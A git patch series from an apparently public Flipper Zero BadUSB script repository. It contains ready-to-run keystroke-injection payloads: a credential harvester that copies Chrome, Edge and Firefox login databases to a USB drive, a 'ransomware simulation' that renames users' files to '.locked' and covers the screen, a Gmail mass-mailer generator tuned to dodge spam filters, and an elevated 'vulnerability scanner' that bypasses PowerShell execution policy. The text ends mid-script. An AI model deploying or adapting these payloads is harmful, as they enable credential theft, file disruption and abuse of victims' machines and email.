From 79221d9efbef1734c4e00d7c70263274ef192c13 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:33:31 -0400 Subject: [PATCH 01/33] Delete BadUSB/CredentialHarvesterByMarkCyber --- BadUSB/CredentialHarvesterByMarkCyber | 62 --------------------------- 1 file changed, 62 deletions(-) delete mode 100644 BadUSB/CredentialHarvesterByMarkCyber diff --git a/BadUSB/CredentialHarvesterByMarkCyber b/BadUSB/CredentialHarvesterByMarkCyber deleted file mode 100644 index b66d4625..00000000 --- a/BadUSB/CredentialHarvesterByMarkCyber +++ /dev/null @@ -1,62 +0,0 @@ -REM This script was created by github.com/MarkCyber -REM Harvests all credentials from chrome, edge, and firefox -REM This script requires a secondary USB named "MYUSB" to save credentials to -REM The extracted data will require decryption - -REM Set delay for Flipper Zero -DELAY 1000 - -REM Open PowerShell with elevated privileges -GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER -DELAY 1000 - -REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; -STRING if ($usbDrive -ne $null) { -ENTER -DELAY 500 -STRING cd $usbDrive; -ENTER -DELAY 500 -STRING mkdir BrowserData; -ENTER -DELAY 500 -STRING cd BrowserData; -ENTER -DELAY 500 - -REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } -ENTER -DELAY 500 - -REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } -ENTER -DELAY 500 - -REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } -ENTER -DELAY 500 -STRING } -ENTER -DELAY 500 - -REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC) -STRING echo off | clip -ENTER -DELAY 500 - -REM Close PowerShell -STRING exit -ENTER -DELAY 500 -REM Check out my other badusb scripts on github.com/MarkCyber From f86809a4ab3ec46478120218b97b47c8141608d8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:35:26 -0400 Subject: [PATCH 02/33] Create CredentialHarvester --- BadUSB/MarkCyber-BadUSB/CredentialHarvester | 53 +++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/CredentialHarvester diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester b/BadUSB/MarkCyber-BadUSB/CredentialHarvester new file mode 100644 index 00000000..e0d83e27 --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/CredentialHarvester @@ -0,0 +1,53 @@ +REM ################################################################################################################## +REM ############## This script was created by github.com/markcyber ############## +REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## +REM ############## The extracted data will require decryption ############## +REM ################################################################################################################## +REM Open PowerShell +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) +STRING echo off | clip +ENTER +DELAY 500 +REM Close PowerShell +STRING exit +ENTER +DELAY 500 From 651204becb6bb6854bd85fa49cac94548b27be90 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:36:41 -0400 Subject: [PATCH 03/33] Create RansomwareSimMain.txt --- .../RansomwareSimMain.txt | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt new file mode 100644 index 00000000..aef51165 --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt @@ -0,0 +1,91 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 1000 +REM opens powershell (this is for windows machines) +STRING powershell +ENTER +DELAY 3000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 500 +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 500 +ENTER +DELAY 500 +STRING ) +DELAY 500 +ENTER +DELAY 500 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 500 +ENTER +DELAY 500 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 500 +ENTER +DELAY 500 +REM Get all files in the path and rename them +STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } +DELAY 500 +ENTER +DELAY 500 +STRING } +DELAY 500 +ENTER +DELAY 2000 +REM Display ransomware message +STRING Add-Type -AssemblyName PresentationFramework +DELAY 500 +ENTER +DELAY 500 +STRING $Window = New-Object System.Windows.Window +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowStartupLocation = 'CenterScreen' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.WindowState = 'Maximized' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Topmost = $true +DELAY 500 +ENTER +DELAY 500 +STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' +DELAY 500 +ENTER +DELAY 500 +STRING $Window.ShowDialog() +DELAY 500 +ENTER +DELAY 2000 +STRING exit +DELAY 500 +ENTER +REM check out my github at github.com/markcyber for more badusb tools From 1277874a0176fb3bdf1aeaac7a70bf2122dc60c1 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:37:31 -0400 Subject: [PATCH 04/33] Create RansomwareSimCleanup.txt --- .../RansomwareSimCleanup.txt | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt new file mode 100644 index 00000000..01776dbe --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt @@ -0,0 +1,61 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% **This can be ran multiple times if necessary** %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 2000 +STRING powershell +ENTER +REM increased delays to make sure each command can go through even on slower computers +DELAY 6000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 1000 +ENTER +DELAY 1000 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 1000 +ENTER +DELAY 2000 +STRING ) +DELAY 1000 +ENTER +DELAY 3000 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 1000 +ENTER +DELAY 1000 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 1000 +ENTER +DELAY 4000 +REM Get all .locked files in the path and rename them back +STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } +DELAY 2000 +ENTER +DELAY 5000 +STRING } +DELAY 1000 +ENTER +DELAY 4000 +STRING exit +DELAY 1000 +ENTER From f7d4bf9bc5789556cbd432709bd4e201e3364ce8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:37:50 -0400 Subject: [PATCH 05/33] Rename CredentialHarvester to CredentialHarvester.txt --- .../{CredentialHarvester => CredentialHarvester.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/{CredentialHarvester => CredentialHarvester.txt} (100%) diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester b/BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/CredentialHarvester rename to BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt From bcc7e9fa9a52decf5ec67620a6a10d5d28274397 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:38:58 -0400 Subject: [PATCH 06/33] Create EmailSender --- BadUSB/MarkCyber-BadUSB/Emails/EmailSender | 42 ++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender new file mode 100644 index 00000000..a3eadd1c --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender @@ -0,0 +1,42 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% +REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% +REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% +REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% +REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 500 +STRING chrome +ENTER +DELAY 1000 +STRING https://mail.google.com/mail/u/0/#inbox?compose=new +ENTER +DELAY 5000 +DELAY 1000 +STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} +DELAY 500 +TAB +TAB +STRING {YOUR SUBJECT NAME} +TAB +STRING Hi {THEIR NAME} +ENTER +ENTER +STRING {CONTENTS OF THE EMAIL} +ENTER +ENTER +STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} +ENTER +ENTER +STRING Respectfully, +ENTER +ENTER +STRING {YOUR NAME} +ENTER +CTRL ENTER +DELAY 5000 +DELAY 1000 +ALT F4 +REM Check out github.com/MarkCyber for more scripts From 05712f5b8c3559bcfca83010ad63ae28e16bea7a Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:39:12 -0400 Subject: [PATCH 07/33] Rename EmailSender to EmailSender.txt --- BadUSB/MarkCyber-BadUSB/Emails/{EmailSender => EmailSender.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/Emails/{EmailSender => EmailSender.txt} (100%) diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/Emails/EmailSender rename to BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt From 5d2d96543ece9806250af055e0483afd7b7d1b54 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:40:24 -0400 Subject: [PATCH 08/33] Create GenerateEmailSendBadUSB.py --- .../Emails/GenerateEmailSendBadUSB.py | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py new file mode 100644 index 00000000..16662391 --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py @@ -0,0 +1,101 @@ +####################################################################################################################################### +####################################################################################################################################### +################# This script was created by github.com/MarkCyber (w/ assistance of ai) #################### +################# This is a python script to automatically create BadUSB scripts to auto send emails #################### +################# This takes a excel sheet with the columns named "Names" and "Emails" #################### +################# This script will then make a badusb script using the name + email of each person #################### +################# There are various subject options that will be chosen from, to minimize "spam" #################### +################# Change the signature to your name, and put subject options that fit your email #################### +################# Lastly, of course make sure to change the contents of the email to what you want #################### +####################################################################################################################################### +####################################################################################################################################### + +import pandas as pd +import random + +# Load the Excel file, make sure it has the same name (or change the name in this script) +file_path = 'NameAndEmails.xlsx' +data_df = pd.read_excel(file_path) + +# Your excel should have 2 columns. Names, and Emails. +data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True) +data_cleaned_df.columns = ['Name', 'Email'] + +# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not) +subject_options = [ + "Placeholder for subject option 1", + "Placeholder for subject option 2", + "Placeholder for subject option 3", + "Placeholder for subject option 4", + "Placeholder for subject option 5", + "Placeholder for subject option 6", + "Placeholder for subject option 7" +] + +# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided. +# Just modify the actual email body and sender name to fit your needs +email_body_template = """ +Hi {name}, + +Placeholder for email body. + +Warm Regards, +Sender Name +""" + +# Function to generate BadUSB script +def generate_badusb_script_with_placeholders_single_file(data_df): + script_template = [ + "DELAY 1000", + "GUI r", + "DELAY 500", + "STRING chrome", + "ENTER", + "DELAY 1000", + "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in. + "ENTER", + "DELAY 5000" + ] + + scripts = script_template + + for index, row in data_df.iterrows(): + name = row['Name'] + email = row['Email'] + subject = random.choice(subject_options) + random_delay = random.randint(10000, 25000) + + email_body_lines = email_body_template.format(name=name).strip().split('\n') + email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()] + + email_script = [ + "DELAY 1000", + f"STRING {email}", + "DELAY 500", + "TAB", + "TAB", + f"STRING {subject}", + "TAB" + ] + email_body_lines + [ + "ENTER", + "CONTROL ENTER", + "DELAY 5000", + f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam + "ALT F4" + ] + + scripts += email_script + + return "\n".join(scripts) + +# Generate the BadUSB script with placeholders and proper send command in a single file +final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df) + +# Save the script to a file +final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script +with open(final_script_file_path, 'w') as file: + file.write(final_script_with_placeholders) + +print(f"Script saved to {final_script_file_path}") + +#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts From 7df0a8863f6141ce10b8547df052a71f8a1e4007 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:40:40 -0400 Subject: [PATCH 09/33] Rename GenerateEmailSendBadUSB.py to GenerateEmailSend.py --- .../Emails/{GenerateEmailSendBadUSB.py => GenerateEmailSend.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/Emails/{GenerateEmailSendBadUSB.py => GenerateEmailSend.py} (100%) diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py similarity index 100% rename from BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py rename to BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py From fb762b2fe3de0d2c2d384d6e7e3bbb1568ac5841 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:42:14 -0400 Subject: [PATCH 10/33] Create VulnerabilityScanner.txt --- .../MarkCyber-BadUSB/VulnerabilityScanner.txt | 630 ++++++++++++++++++ 1 file changed, 630 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt diff --git a/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt new file mode 100644 index 00000000..51e1b0d0 --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt @@ -0,0 +1,630 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +REM Open Start Menu +CONTROL ESCAPE +DELAY 2000 +STRING powershell +REM Navigate to the context menu to run PowerShell as an administrator +DELAY 500 +RIGHTARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 3000 +ALT Y +DELAY 5000 +REM Set PowerShell Execution Policy to Bypass +DELAY 1000 +STRING set-executionpolicy bypass -scope process -force +DELAY 200 +ENTER +DELAY 200 +REM Create the PowerShell script in memory and execute it +DELAY 200 +STRING $usbName = "MYUSB" +DELAY 200 +ENTER +DELAY 200 +STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter +DELAY 200 +ENTER +DELAY 200 +STRING if ($usbDrive) { +DELAY 200 +ENTER +DELAY 200 +STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName +DELAY 200 +ENTER +DELAY 200 +STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner +DELAY 200 +ENTER +DELAY 200 +STRING New-Item -ItemType Directory -Path $directoryPath +DELAY 200 +ENTER +DELAY 200 +STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt" +DELAY 200 +ENTER +DELAY 200 +STRING "" > $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING function check-passwordpolicy { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING net accounts +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking password policy: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function audit-services { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-service | select-object name, displayname, status, starttype +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error auditing services: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-networksettings { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-netipconfiguration +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking network settings: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-softwarevulnerabilities { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking software vulnerabilities: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-cve { +DELAY 200 +ENTER +DELAY 200 +STRING param ( +DELAY 200 +ENTER +DELAY 200 +STRING [string]$productname, +DELAY 200 +ENTER +DELAY 200 +STRING [string]$version +DELAY 200 +ENTER +DELAY 200 +STRING ) +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay = 2 +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING $response = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($response.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $response.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking CVEs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING if ($_.Exception -match '403') { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..." +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds 60 +DELAY 200 +ENTER +DELAY 200 +STRING $retryResponse = invoke-restmethod -uri $uri -method get +DELAY 200 +ENTER +DELAY 200 +STRING if ($retryResponse.totalresults -gt 0) { +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($cve in $retryResponse.result.cve_items) { +DELAY 200 +ENTER +DELAY 200 +STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING "no cves found for $productname $version" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function analyze-logs { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-eventlog -logname system -newest 100 +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error analyzing logs: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-openports { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netstat -an +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking open ports: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-missingupdates { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Checking Windows Update logs..." +DELAY 200 +ENTER +DELAY 200 +STRING $updateLogPath = Join-Path 